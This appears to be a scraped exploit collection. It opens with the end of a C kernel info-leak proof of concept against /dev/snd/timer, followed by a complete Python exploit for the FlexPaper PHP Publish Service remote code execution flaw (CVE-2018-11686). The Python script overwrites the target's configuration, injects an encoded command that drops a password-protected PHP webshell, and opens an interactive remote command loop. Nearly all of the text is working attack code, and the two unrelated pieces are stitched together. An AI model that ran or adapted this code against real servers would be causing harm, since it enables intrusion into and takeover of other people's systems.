leak_value_v = *((unsigned long *)(&td.val+1));
printf("leak_value(val) : %lx\n", leak_value_v);
}
int main(int argc, char **argv)
{
fd = open("/dev/snd/timer", O_RDWR);
if (fd < 0) {
printf("open error : %d, %s\n", errno, strerror(errno));
return -1;
}
leak();
close(fd);
return 0;
}
#!/usr/bin/env python
#Exploit Title: FlexPaper PHP Publish Service <= 2.3.6 RCE
#Date: March 2019
#Exploit Author: Red Timmy Security - redtimmysec.wordpress.com
#Vendor Homepage: https://flowpaper.com/download/
#Version: <= 2.3.6
#Tested on: Linux/Unix
#CVE : CVE-2018-11686
#Disclamer: This exploit is for educational purpose only
#More details on https://redtimmysec.wordpress.com/2019/03/07/flexpaper-remote-code-execution/
import sys
import requests
import readline
import urllib2
import ssl
try:
url = sys.argv[1]
except:
print "[-] usage $python shredpaper.py http://targert.com/flexpaper/"
print sys.exit(1)
print """
__ __
_____/ /_ ________ ____/ ____ ____ _____ ___ _____
/ ___/ __ \/ ___/ _ \/ __ / __ \/ __ `/ __ \/ _ \/ ___/
(__ / / / / / / __/ /_/ / /_/ / /_/ / /_/ / __/ /
/____/_/ /_/_/ \___/\__,_/ .___/\__,_/ .___/\___/_/
/_/ /_/
"""
print "[*] FlexPaper <= 2.3.6 Remote Command Execution - Red Timmy Security)"
print "[*] Attacking %s" %url
print "[*] Deleting target configuration file"
payload = (("SAVE_CONFIG","1"),("PDF_Directory","/var/www/html/flex2.3.6/flexpaper/pdf"),("SWF_Directory","config/"),("LICENSEKEY",""),("splitmode","1"),("RenderingOrder_PRIM","flash"),("RenderingOrder_SEC","html"))
url1 = url+"/php/change_config.php"
r1 = requests.post(url1, data=payload)
rx = requests.post(url1, data=payload) #resend
shellcode = "%69%64%3b%65%63%68%6f%20%50%44%39%77%61%48%41%4b%43%69%52%72%5a%58%6b%67%50%53%41%6b%58%30%64%46%56%46%73%6e%59%57%4e%6a%5a%58%4e%7a%4a%31%30%37%43%67%70%70%5a%69%67%6b%61%32%56%35%50%54%30%6e%4d%44%6b%34%4e%7a%63%7a%4e%7a%59%78%4d%54%59%30%4e%7a%49%33%4e%44%49%33%4f%44%51%7a%4d%6a%51%34%4d%6a%52%74%65%47%31%74%65%47%30%6e%4b%58%73%4b%43%67%6c%6c%59%32%68%76%49%48%4e%6f%5a%57%78%73%58%32%56%34%5a%57%4d%6f%59%6d%46%7a%5a%54%59%30%58%32%52%6c%59%32%39%6b%5a%53%67%6b%58%30%64%46%56%46%73%6e%59%32%31%6b%4a%31%30%70%4b%54%73%4b%43%6e%30%37%43%6a%38%2b%43%67%3d%3d%7c%62%61%73%65%36%34%20%2d%64%20%3e%24%28%70%77%64%29%2f%74%69%67%65%72%5f%73%68%65%6c%6c%2e%70%68%70%3b%69%64"
print "[*] Uploading webshell.."
url2 = url+"/php/setup.php?step=2&PDF2SWF_PATH="+shellcode
r2 = requests.get(url2)
print "[*] Checking if shell is uploaded successfully"
webshell = url+ '/php/tiger_shell.php'
check_shell = requests.get(webshell)
if check_shell.status_code == 200:
print "[*] We got a shell"
else:
print "[-] Exploit failed, die"
sys.exit(2)
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
while True:
cmd = raw_input("enter cmd>>")
cmd = cmd.strip()
cmd = cmd.encode('base64').strip().replace("\n","")
link = url+"/php/tiger_shell.php?cmd=%s&access=09877376116472742784324824mxmmxm" %cmd.strip()
#print link
try:
response = urllib2.urlopen(link, context=ctx)
page = response.read()
print page
except Exception as exc:
print exc
continue